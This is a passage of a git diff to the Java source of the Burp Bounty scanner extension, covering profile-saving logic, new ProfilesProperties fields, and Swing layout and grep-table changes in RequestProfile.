System.out.println(element); + } + } + } + + public void saveRequestAttackValues(RequestProfile profile) { + //Save attack with fields values + try { + //get GUI values + ProfilesProperties newfile = new ProfilesProperties(); + + newfile.setProfileName(profile.text1.getText()); + + newfile.setAuthor(profile.textauthor.getText()); + + newfile.setScanner(3); + + newfile.setEnabled(true); + List greps = new ArrayList(); + List tags = new ArrayList(); + + newfile.setGrepsFile(profile.textgreps.getText()); + + for (int i = 0; i < profile.modelgrep.getRowCount(); i++) { + if (!profile.modelgrep.getValueAt(i, 4).toString().isEmpty()) { + greps.add(profile.modelgrep.getValueAt(i, 0).toString() + "," + profile.modelgrep.getValueAt(i, 1).toString() + "," + profile.modelgrep.getValueAt(i, 2).toString() + "," + profile.modelgrep.getValueAt(i, 3).toString() + "," + profile.modelgrep.getValueAt(i, 4).toString()); + } + } + newfile.setGreps(greps); + + for (int i = 0; i < profile.listtag.getModel().getSize(); i++) { + Object item = profile.listtag.getModel().getElementAt(i); + if (!item.toString().isEmpty()) { + tags.add(item.toString().replaceAll("\r", "").replaceAll("\n", "")); + } + } + if (!tags.contains("All")) { + tags.add("All"); + newfile.setTags(tags); + } else { + newfile.setTags(tags); + } + + + newfile.setURLExtension(profile.text73.getText()); + + if (profile.radio4.isSelected()) { + newfile.setMatchType(1); + } else if (profile.radio3.isSelected()) { + newfile.setMatchType(2); + } else { + newfile.setMatchType(0); + } + + newfile.setVariationAttributes(variationAttributes); + + newfile.setCaseSensitive(profile.check1.isSelected()); + newfile.setNotResponse(profile.check4.isSelected()); + newfile.setIsURLExtension(profile.check73.isSelected()); + newfile.setNegativeURLExtension(profile.negativeURL.isSelected()); + newfile.setIssueName(profile.text4.getText()); + newfile.setIssueDetail(profile.textarea1.getText()); + newfile.setIssueBackground(profile.textarea2.getText()); + newfile.setRemediationDetail(profile.textarea3.getText()); + newfile.setRemediationBackground(profile.textarea4.getText()); + + if (profile.radio5.isSelected()) { + newfile.setIssueSeverity("High"); + } else if (profile.radio6.isSelected()) { + newfile.setIssueSeverity("Medium"); + } else if (profile.radio7.isSelected()) { + newfile.setIssueSeverity("Low"); + } else if (profile.radio8.isSelected()) { + newfile.setIssueSeverity("Information"); + } else { + newfile.setIssueSeverity(""); + } + + if (profile.radio9.isSelected()) { + newfile.setIssueConfidence("Certain"); + } else if (profile.radio10.isSelected()) { + newfile.setIssueConfidence("Firm"); + } else if (profile.radio11.isSelected()) { + newfile.setIssueConfidence("Tentative"); + } else { + newfile.setIssueConfidence(""); + } + + //Save start + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); + + JsonArray ijson = new JsonArray(); + List newjson = gson.fromJson(ijson, new TypeToken>() { + }.getType()); + newjson.add(newfile); + + String json = gson.toJson(newjson); + + //Write JSON String to file + FileOutputStream fileStream; + + fileStream = new FileOutputStream(new File(profiles_directory + File.separator + profile.text1.getText().concat(".bb"))); + + OutputStreamWriter writer = new OutputStreamWriter(fileStream, "UTF-8"); + writer.write(json); + writer.close(); + + } catch (IOException e) { + System.out.println("ProfilesManager line 1403:"); + for (StackTraceElement element : e.getStackTrace()) { + System.out.println(element); + } + } + } + + public void setSelectedVariations(boolean state, ActiveProfile profile) { + profile.status_code.setSelected(state); + profile.input_image_labels.setSelected(state); + profile.non_hidden_form_input_types.setSelected(state); + profile.page_title.setSelected(state); + profile.visible_text.setSelected(state); + profile.button_submit_labels.setSelected(state); + profile.div_ids.setSelected(state); + profile.word_count.setSelected(state); + profile.content_type.setSelected(state); + profile.outbound_edge_tag_names.setSelected(state); + profile.whole_body_content.setSelected(state); + profile.etag_header.setSelected(state); + profile.visible_word_count.setSelected(state); + profile.content_length.setSelected(state); + profile.header_tags.setSelected(state); + profile.tag_ids.setSelected(state); + profile.comments.setSelected(state); + profile.line_count.setSelected(state); + profile.set_cookie_names.setSelected(state); + profile.last_modified_header.setSelected(state); + profile.first_header_tag.setSelected(state); + profile.tag_names.setSelected(state); + profile.input_submit_labels.setSelected(state); + profile.outbound_edge_count.setSelected(state); + profile.initial_body_content.setSelected(state); + profile.content_location.setSelected(state); + profile.limited_body_content.setSelected(state); + profile.canonical_link.setSelected(state); + profile.css_classes.setSelected(state); + profile.location.setSelected(state); + profile.anchor_labels.setSelected(state); + } + + public void loadPath(String file, DefaultListModel list) { + //Load file for implement payloads + DefaultListModel List = list; + String line; + File fileload = new File(file); + + try { + BufferedReader bufferreader = new BufferedReader(new FileReader(fileload.getAbsolutePath())); + line = bufferreader.readLine(); + + while (line != null) { + List.addElement(line); + line = bufferreader.readLine(); + } + bufferreader.close(); + } catch (FileNotFoundException ex) { + System.out.println("ProfilesManager line 1912:" + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + } catch (IOException ex) { + System.out.println("ProfilesManager line 1815:" + ex.getMessage()); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + } + } + + public void updatePayloads(String file, ProfilesProperties issue) { + + //Load file for implement payloads + List payloads = new ArrayList(); + String line; + File fileload = new File(file); + + try { + BufferedReader bufferreader = new BufferedReader(new FileReader(fileload.getAbsolutePath())); + line = bufferreader.readLine(); + + while (line != null) { + payloads.add(line); + line = bufferreader.readLine(); + } + bufferreader.close(); + + issue.setPayloads(payloads); + + GsonBuilder builder = new GsonBuilder().setPrettyPrinting(); + Gson gson = builder.create(); + String strJson = gson.toJson(issue); + FileWriter writer = null; + + writer = new FileWriter(profiles_directory + File.separator + issue.getProfileName().concat(".bb")); + writer.write("[" + strJson + "]"); + + writer.close(); + } catch (FileNotFoundException ex) { + System.out.println("ProfilesManager line 1639:"); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + } catch (IOException ex) { + System.out.println("ProfilesManager line 1042:"); + for (StackTraceElement element : ex.getStackTrace()) { + System.out.println(element); + } + } + } +} diff --git a/src/ProfilesProperties.java b/src/ProfilesProperties.java index 9e32977..95b05ba 100755 --- a/src/ProfilesProperties.java +++ b/src/ProfilesProperties.java @@ -13,67 +13,77 @@ See the License for the specific language governing permissions and limitations under the License. */ -package burpbounty; +package burpbountyfree; +import java.util.ArrayList; import java.util.List; public class ProfilesProperties { - private String Name; - private boolean Enabled; - private int Scanner; - private String Author; - private List Payloads; - private List Encoder; - private boolean UrlEncode; - private String CharsToUrlEncode; - private List Grep; - private List Tags; - private boolean PayloadResponse; - private boolean NotResponse; - private String TimeOut; - private boolean isTime; - private String contentLength; - private boolean iscontentLength; - private boolean CaseSensitive; - private boolean ExcludeHTTP; - private boolean OnlyHTTP; - private boolean IsContentType; - private String ContentType; - private boolean NegativeCT; - private boolean IsResponseCode; - private String ResponseCode; - private boolean NegativeRC; - private String urlextension; - private boolean isurlextension; - private boolean NegativeUrlExtension; - private int MatchType; - private int RedirType; - private int MaxRedir; + private String ProfileName; + private String Name = ""; + private boolean Enabled = false; + private int Scanner = 0; + private String Author = ""; + private List Payloads = new ArrayList(); + private List Encoder = new ArrayList(); + private boolean UrlEncode = false; + private String CharsToUrlEncode = ""; + private List Grep = new ArrayList(); + private List Tags = new ArrayList(); + private boolean PayloadResponse = false; + private boolean NotResponse = false; + private String TimeOut1 = ""; + private String TimeOut2 = ""; + private boolean isTime = false; + private String contentLength = ""; + private boolean iscontentLength = false; + private boolean CaseSensitive = false; + private boolean ExcludeHTTP = false; + private boolean OnlyHTTP = false; + private boolean IsContentType = false; + private String ContentType = ""; + private String HttpResponseCode = ""; + private boolean NegativeCT = false; + private boolean IsResponseCode = false; + private String ResponseCode = ""; + private boolean NegativeRC = false; + private String urlextension = ""; + private boolean isurlextension = false; + private boolean NegativeUrlExtension = false; + private int MatchType = 0; + private int Scope = 0; + private int RedirType = 0; + private int MaxRedir = 0; private int payloadPosition; - private String payloadsFile; - private String grepsFile; - private String IssueName; - private String IssueSeverity; - private String IssueConfidence; - private String IssueDetail; - private String RemediationDetail; - private String IssueBackground; - private String RemediationBackground; - private List Header; - private List VariationAttributes; - private List InsertionPointType; - Boolean Scanas; - int Scantype; - private boolean pathDiscovery; + private String payloadsFile = ""; + private String grepsFile = ""; + private String IssueName = ""; + private String IssueSeverity = ""; + private String IssueConfidence = ""; + private String IssueDetail = ""; + private String RemediationDetail = ""; + private String IssueBackground = ""; + private String RemediationBackground = ""; + private List Header = new ArrayList(); + private List VariationAttributes = new ArrayList(); + private List InsertionPointType = new ArrayList(); + private Boolean Scanas = false; + private int Scantype = 0; + private boolean pathDiscovery = false; public ProfilesProperties() { super(); } + public String getProfileName() { + return ProfileName; + } + public String getName() { return Name; } + public List getHeader() { return Header; @@ -166,9 +176,17 @@ public boolean getIsContentType() { public String getContentType() { return ContentType; } - - public String getTime() { - return TimeOut; + + public String getHttpResponseCode() { + return HttpResponseCode; + } + + public String getTime1() { + return TimeOut1; + } + + public String getTime2() { + return TimeOut2; } public boolean getIsTime() { @@ -222,7 +240,11 @@ public boolean getUrlEncode() { public int getMatchType() { return MatchType; } - + + public int getScope() { + return Scope; + } + public int getRedirection() { return RedirType; } @@ -260,10 +282,10 @@ public String getRemediationBackground() { } //Set functions - public void setName(String name) { - Name = name; + public void setProfileName(String profilename) { + ProfileName = profilename; } - + public void setHeader(List header) { Header = header; } @@ -357,8 +379,12 @@ public void setIsContentType(boolean iscontenttype) { IsContentType = iscontenttype; } - public void setTime(String timeout) { - TimeOut = timeout; + public void setTime1(String timeout1) { + TimeOut1 = timeout1; + } + + public void setTime2(String timeout2) { + TimeOut2 = timeout2; } public void setIsTime(boolean istime) { @@ -368,7 +394,11 @@ public void setIsTime(boolean istime) { public void setContentLength(String contentlength) { contentLength = contentlength; } - + + public void setHttpResponseCode(String httpresponsecode) { + HttpResponseCode = httpresponsecode; + } + public void setIsContentLength(boolean iscontentlength) { iscontentLength = iscontentlength; } @@ -412,6 +442,10 @@ public void setUrlEncode(boolean urlencode) { public void setMatchType(int matchtype) { MatchType = matchtype; } + + public void setScope(int scope) { + Scope = scope; + } public void setRedirType(int redirtype) { RedirType = redirtype; @@ -448,4 +482,5 @@ public void setRemediationDetail(String remediationdetail) { public void setRemediationBackground(String remediationbackground) { RemediationBackground = remediationbackground; } + } diff --git a/src/RequestProfile.form b/src/RequestProfile.form index fb75171..69a2435 100755 --- a/src/RequestProfile.form +++ b/src/RequestProfile.form @@ -3,25 +3,41 @@ + + + + + + + + + + + + + + + + + + + + + - - - - - @@ -45,25 +61,25 @@ - - + + - + - + - - + + @@ -112,7 +128,7 @@ - + @@ -144,64 +160,70 @@ - - - - + - - - - - - - + + + + + - - - - + + + + + + + + + + + + + + + + + + + + + + + + - - - + + + + + + + - - - - - - - - - - - - - - + + - + - @@ -216,9 +238,10 @@ - - - + + + + @@ -227,7 +250,6 @@ - @@ -236,11 +258,11 @@ - + - - + + @@ -248,7 +270,13 @@ - + + + + + + + @@ -417,6 +445,27 @@ + + + + + + + + + + + + + + + + + + + + + @@ -517,7 +566,7 @@ - + diff --git a/src/RequestProfile.java b/src/RequestProfile.java index 4fafb10..7822501 100755 --- a/src/RequestProfile.java +++ b/src/RequestProfile.java @@ -13,7 +13,7 @@ See the License for the specific language governing permissions and limitations under the License. */ -package burpbounty; +package burpbountyfree; import burp.IBurpExtenderCallbacks; import java.awt.Desktop; @@ -35,7 +35,9 @@ import java.util.ArrayList; import java.util.Arrays; import java.util.List; +import javax.swing.DefaultCellEditor; import javax.swing.DefaultListModel; +import javax.swing.JComboBox; import javax.swing.JDialog; import javax.swing.JFileChooser; import javax.swing.JFrame; @@ -71,6 +73,7 @@ public class RequestProfile extends javax.swing.JPanel { DefaultTableModel model4; DefaultTableModel model9; DefaultTableModel model10; + DefaultTableModel rulemodel; DefaultTableModel modelgrep; IBurpExtenderCallbacks callbacks; String filename; @@ -105,10 +108,10 @@ public Class getColumnClass(int columnIndex) { @Override public boolean isCellEditable(int row, int column) { - if (column == 0 || column == 4) { - return true; - } else { + if (row == 0 && column == 1) { return false; + } else { + return true; } } @@ -117,9 +120,9 @@ public boolean isCellEditable(int row, int column) { initComponents(); if (callbacks.loadExtensionSetting("filename") != null) { - filename = callbacks.loadExtensionSetting("filename")+ File.separator;; + filename = callbacks.loadExtensionSetting("filename") + File.separator; } else { - filename = System.getProperty("user.home")+ File.separator;; + filename = System.getProperty("user.home") + File.separator; } showTags(); showGrepsTable(); @@ -137,7 +140,7 @@ public String getClipboardContents() { try { result = (String) contents.getTransferData(DataFlavor.stringFlavor); } catch (UnsupportedFlavorException | IOException ex) { - callbacks.printError("RequestProfile line 147: " + ex.getMessage()); + System.out.println("RequestProfile line 147: " + ex.getMessage()); } } return result; @@ -151,19 +154,33 @@ public void swap(int a, int b) { } public void showGrepsTable() { + JComboBox operator = new JComboBox(); + JComboBox ipt = new JComboBox(); + JComboBox param = new JComboBox(); modelgrep.setNumRows(0); modelgrep.setColumnCount(0); modelgrep.addColumn("Enabled"); modelgrep.addColumn("Operator"); - modelgrep.addColumn("Insertion Point type"); + modelgrep.addColumn("Insertion point type"); modelgrep.addColumn("Parameter"); - modelgrep.addColumn("Grep Value"); + modelgrep.addColumn("Grep value"); + + table4.getColumnModel().getColumn(0).setPreferredWidth(25); + table4.getColumnModel().getColumn(1).setPreferredWidth(30); + table4.getColumnModel().getColumn(2).setPreferredWidth(100); + table4.getColumnModel().getColumn(3).setPreferredWidth(40); + table4.getColumnModel().getColumn(4).setPreferredWidth(200); + + operator.addItem("Or"); + operator.addItem("And"); - table4.getColumnModel().getColumn(0).setPreferredWidth(20); - table4.getColumnModel().getColumn(1).setPreferredWidth(25); - table4.getColumnModel().getColumn(2).setPreferredWidth(90); - table4.getColumnModel().getColumn(3).setPreferredWidth(35); - table4.getColumnModel().getColumn(4).setPreferredWidth(240); + ipt.addItem("All Request"); + + param.addItem("Value"); + + table4.getColumnModel().getColumn(1).setCellEditor(new DefaultCellEditor(operator)); + table4.getColumnModel().getColumn(2).setCellEditor(new DefaultCellEditor(ipt)); + table4.getColumnModel().getColumn(3).setCellEditor(new DefaultCellEditor(param)); TableRowSorter sorter = new TableRowSorter<>(table4.getModel()); table4.setRowSorter(sorter); @@ -177,20 +194,32 @@ public void showGreps(List greps) { for (String grepline : greps) { List array = Arrays.asList(grepline.split(",",5)); if (array.size() > 1) { - if (array.get(0).equals("true")) { - modelgrep.addRow(new Object[]{true, "Or", "All Request", "Name", array.get(4)}); + if (modelgrep.getRowCount() == 0) { + if (array.get(0).equals("true")) { + modelgrep.addRow(new Object[]{true, "", array.get(2), array.get(3), array.get(4)}); + } else { + modelgrep.addRow(new Object[]{false, "", array.get(2), array.get(3), array.get(4)}); + } } else { - modelgrep.addRow(new Object[]{false, "Or", "All Request", "Name", array.get(4)}); + if (array.get(0).equals("true")) { + modelgrep.addRow(new Object[]{true, array.get(1), array.get(2), array.get(3), array.get(4)}); + } else { + modelgrep.addRow(new Object[]{false, array.get(1), array.get(2), array.get(3), array.get(4)}); + } } } else { - modelgrep.addRow(new Object[]{true, "Or", "All Request", "Name", grepline}); + if (modelgrep.getRowCount() == 0) { + modelgrep.addRow(new Object[]{true, "", "All Request", "Value", grepline}); + } else { + modelgrep.addRow(new Object[]{true, "Or", "All Request", "Value", grepline}); + } } } } public void loadGrepsFile(DefaultTableModel model) { //Load file for implement payloads and match load button - List greps = new ArrayList(); + List grep = new ArrayList(); String line; JFrame parentFrame = new JFrame(); JFileChooser fileChooser = new JFileChooser(); @@ -206,15 +235,15 @@ public void loadGrepsFile(DefaultTableModel model) { line = bufferreader.readLine(); while (line != null) { - greps.add(line); + grep.add(line); line = bufferreader.readLine(); } bufferreader.close(); - showGreps(greps); + showGreps(grep); } catch (FileNotFoundException ex) { - callbacks.printError("RequestProfile line 263:"); + System.out.println("RequestProfile line 263:"); } catch (IOException ex) { - callbacks.printError("RequestProfile line 267:"); + System.out.println("RequestProfile line 267:"); } } } @@ -226,7 +255,7 @@ public void addNewTag(String str) { out.write(str.concat("\n")); out.close(); } catch (IOException e) { - callbacks.printError("RequestProfile line 278: " + e.getMessage()); + System.out.println("RequestProfile line 278: " + e.getMessage()); } } } @@ -238,7 +267,7 @@ public void removeTag(String tag) { File inFile = new File(file); if (!inFile.isFile()) { - callbacks.printError("RequestProfile line 289: " + "Parameter is not an existing file"); + System.out.println("RequestProfile line 289: " + "Parameter is not an existing file"); return; } @@ -264,19 +293,19 @@ public void removeTag(String tag) { //Delete the original file if (!inFile.delete()) { - callbacks.printError("RequestProfile line 315: " + "Could not delete file"); + System.out.println("RequestProfile line 315: " + "Could not delete file"); return; } //Rename the new file to the filename the original file had. if (!tempFile.renameTo(inFile)) { - callbacks.printError("RequestProfile line 321: " + "Could not rename file"); + System.out.println("RequestProfile line 321: " + "Could not rename file"); } } catch (FileNotFoundException ex) { - callbacks.printError("RequestProfile line 325:"); + System.out.println("RequestProfile line 325:"); } catch (IOException ex) { - callbacks.printError("RequestProfile line 329:"); + System.out.println("RequestProfile line 329:"); } } @@ -302,7 +331,7 @@ private List readFile(String filename) { } reader.close(); } catch (Exception e) { - callbacks.printError("RequestPorfile line 363:" + e.getMessage()); + System.out.println("RequestPorfile line 363:" + e.getMessage()); } return records; } @@ -349,6 +378,9 @@ private void initComponents() { textgreps = new javax.swing.JTextField(); jLabel1 = new javax.swing.JLabel(); jLabel5 = new javax.swing.JLabel(); + check73 = new javax.swing.JCheckBox(); + text73 = new javax.swing.JTextField(); + negativeURL = new javax.swing.JCheckBox(); jScrollPane10 = new javax.swing.JScrollPane(); jPanel12 = new javax.swing.JPanel(); jLabel32 = new javax.swing.JLabel(); @@ -398,8 +430,6 @@ private void initComponents() { jLabel47 = new javax.swing.JLabel(); newTagb = new javax.swing.JButton(); - setPreferredSize(new java.awt.Dimension(800, 500)); - text1.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N jLabel18.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N @@ -412,7 +442,7 @@ private void initComponents() { headerstab.setAutoscrolls(true); headerstab.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N - headerstab.setPreferredSize(new java.awt.Dimension(800, 550)); + headerstab.setPreferredSize(new java.awt.Dimension(800, 600)); headerstab.addChangeListener(new javax.swing.event.ChangeListener() { public void stateChanged(javax.swing.event.ChangeEvent evt) { headerstabStateChanged(evt); @@ -423,7 +453,6 @@ public void stateChanged(javax.swing.event.ChangeEvent evt) { jScrollPane6.getVerticalScrollBar().setUnitIncrement(20); jPanel11.setAutoscrolls(true); - jPanel11.setPreferredSize(new java.awt.Dimension(1008, 500)); buttonGroup3.add(radio4); radio4.setText("Simple string"); @@ -506,45 +535,57 @@ public void mouseClicked(java.awt.event.MouseEvent evt) { } }); + check73.setText("URL Extension"); + + negativeURL.setText("Negative match"); + javax.swing.GroupLayout jPanel11Layout = new javax.swing.GroupLayout(jPanel11); jPanel11.setLayout(jPanel11Layout); jPanel11Layout.setHorizontalGroup( jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(jSeparator6, javax.swing.GroupLayout.Alignment.TRAILING) .addGroup(jPanel11Layout.createSequentialGroup() .addContainerGap() .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addGroup(jPanel11Layout.createSequentialGroup() - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING) + .addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel11Layout.createSequentialGroup() .addComponent(button8, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(button10, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(button18, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(button7, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(button19, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE)) - .addGap(18, 18, Short.MAX_VALUE) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(textgreps, javax.swing.GroupLayout.PREFERRED_SIZE, 651, javax.swing.GroupLayout.PREFERRED_SIZE) - .addComponent(jScrollPane14, javax.swing.GroupLayout.PREFERRED_SIZE, 649, javax.swing.GroupLayout.PREFERRED_SIZE)) - .addContainerGap(238, Short.MAX_VALUE)) + .addGap(18, 18, 18) + .addComponent(textgreps, javax.swing.GroupLayout.PREFERRED_SIZE, 598, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel11Layout.createSequentialGroup() + .addGap(9, 9, 9) + .addComponent(jLabel5, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addGroup(jPanel11Layout.createSequentialGroup() + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false) + .addComponent(button18, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE) + .addComponent(button10, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) + .addComponent(button7, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE) + .addComponent(button19, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addGap(18, 18, 18) + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addGroup(jPanel11Layout.createSequentialGroup() + .addComponent(jLabel1) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(radio4) + .addComponent(radio3))) + .addComponent(jScrollPane14, javax.swing.GroupLayout.PREFERRED_SIZE, 598, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addContainerGap(132, Short.MAX_VALUE))) .addGroup(jPanel11Layout.createSequentialGroup() .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(jLabel25) - .addComponent(jLabel24, javax.swing.GroupLayout.PREFERRED_SIZE, 769, javax.swing.GroupLayout.PREFERRED_SIZE) + .addGroup(jPanel11Layout.createSequentialGroup() + .addComponent(check73) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) + .addComponent(text73, javax.swing.GroupLayout.PREFERRED_SIZE, 579, javax.swing.GroupLayout.PREFERRED_SIZE) + .addGap(18, 18, 18) + .addComponent(negativeURL)) .addComponent(jLabel31) .addComponent(jLabel30, javax.swing.GroupLayout.PREFERRED_SIZE, 769, javax.swing.GroupLayout.PREFERRED_SIZE) .addComponent(check4) .addComponent(check1) - .addGroup(jPanel11Layout.createSequentialGroup() - .addGap(9, 9, 9) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addGroup(jPanel11Layout.createSequentialGroup() - .addComponent(jLabel1) - .addGap(18, 18, 18) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) - .addComponent(radio4) - .addComponent(radio3))) - .addComponent(jLabel5, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)))) - .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)))) - .addComponent(jSeparator6) + .addComponent(jLabel25) + .addComponent(jLabel24, javax.swing.GroupLayout.PREFERRED_SIZE, 769, javax.swing.GroupLayout.PREFERRED_SIZE)) + .addContainerGap(42, Short.MAX_VALUE)))) ); jPanel11Layout.setVerticalGroup( jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) @@ -557,8 +598,9 @@ public void mouseClicked(java.awt.event.MouseEvent evt) { .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) .addComponent(textgreps, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addComponent(button8)) - .addGap(18, 18, 18) - .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false) + .addGap(18, 18, Short.MAX_VALUE) + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) + .addComponent(jScrollPane14, javax.swing.GroupLayout.PREFERRED_SIZE, 206, javax.swing.GroupLayout.PREFERRED_SIZE) .addGroup(jPanel11Layout.createSequentialGroup() .addComponent(button19) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) @@ -566,19 +608,18 @@ public void mouseClicked(java.awt.event.MouseEvent evt) { .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(button10) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) - .addComponent(button18)) - .addComponent(jScrollPane14, javax.swing.GroupLayout.PREFERRED_SIZE, 0, Short.MAX_VALUE)) + .addComponent(button18))) .addGap(18, 18, 18) .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) .addComponent(radio4) .addComponent(jLabel1)) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(radio3) - .addGap(30, 30, 30) - .addComponent(jLabel5, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(18, 18, 18) - .addComponent(jSeparator6, javax.swing.GroupLayout.PREFERRED_SIZE, 3, javax.swing.GroupLayout.PREFERRED_SIZE) + .addComponent(jLabel5, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(18, 18, 18) + .addComponent(jSeparator6, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(jLabel31) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(jLabel30) @@ -586,7 +627,12 @@ public void mouseClicked(java.awt.event.MouseEvent evt) { .addComponent(check4) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(check1) - .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) + .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) + .addComponent(check73) + .addComponent(text73, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) + .addComponent(negativeURL)) + .addContainerGap(58, Short.MAX_VALUE)) ); JScrollPane responseresScroll = new JScrollPane(jPanel11, @@ -744,7 +790,7 @@ public void mouseClicked(java.awt.event.MouseEvent evt) { .addComponent(text4, javax.swing.GroupLayout.PREFERRED_SIZE, 419, javax.swing.GroupLayout.PREFERRED_SIZE))))) .addComponent(jLabel41) .addComponent(jLabel40)) - .addContainerGap(120, Short.MAX_VALUE)) + .addContainerGap(93, Short.MAX_VALUE)) ); jPanel12Layout.setVerticalGroup( jPanel12Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) @@ -909,25 +955,33 @@ public void actionPerformed(java.awt.event.ActionEvent evt) { .addGap(18, 18, 18) .addComponent(jLabel18) .addGap(18, 18, 18) - .addComponent(textauthor, javax.swing.GroupLayout.PREFERRED_SIZE, 217, javax.swing.GroupLayout.PREFERRED_SIZE) - .addContainerGap()) - .addComponent(headerstab, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) + .addComponent(textauthor, javax.swing.GroupLayout.PREFERRED_SIZE, 165, javax.swing.GroupLayout.PREFERRED_SIZE) + .addGap(64, 64, 64)) + .addComponent(headerstab, javax.swing.GroupLayout.DEFAULT_SIZE, 831, Short.MAX_VALUE) ); layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(layout.createSequentialGroup() - .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) + .addContainerGap() .addGroup(layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) .addComponent(text1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addComponent(jLabel12) .addComponent(textauthor, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addComponent(jLabel18)) - .addGap(18, 18, 18) + .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED) .addComponent(headerstab, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) - 